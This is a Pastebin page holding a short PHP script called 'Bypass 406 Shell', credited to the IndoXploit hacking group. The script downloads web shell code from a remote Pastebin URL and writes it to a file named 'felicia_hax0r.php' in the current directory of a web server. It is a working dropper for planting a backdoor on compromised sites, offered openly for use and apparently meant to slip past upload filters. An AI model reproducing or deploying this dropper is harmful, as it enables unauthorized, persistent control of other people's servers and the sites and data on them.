Advertisement
FadlyHdytllah

[PHP] Bypass 406 Shell

Feb 19th, 2020
555
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.51 KB | None | 0 0
  1. <?
  2. //* Bypass 406
  3. //* Greet'z : IndoXploit
  4. //* From : https://pastebin.com/u/FadlyHdytllah
  5. error_reporting(0);
  6. $filename="felicia_hax0r.php"; // Nama Shell nya
  7. $fget=file_get_contents("https://pastebin.com/raw/M731c7Ps"); // Link shell
  8.  
  9. $path=getcwd().DIRECTORY_SEPARATOR;
  10. $fileopen=fopen("$path/$filename",'w');
  11. $execfile=fwrite($fileopen,$fget);
  12. if($execfile)
  13. {
  14. echo "<script>alert('OK!')</script>";
  15. echo "Location › $path$filename";
  16. }
  17. else {
  18. echo "<script>alert('Failed:(')</script>";
  19. }
  20. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement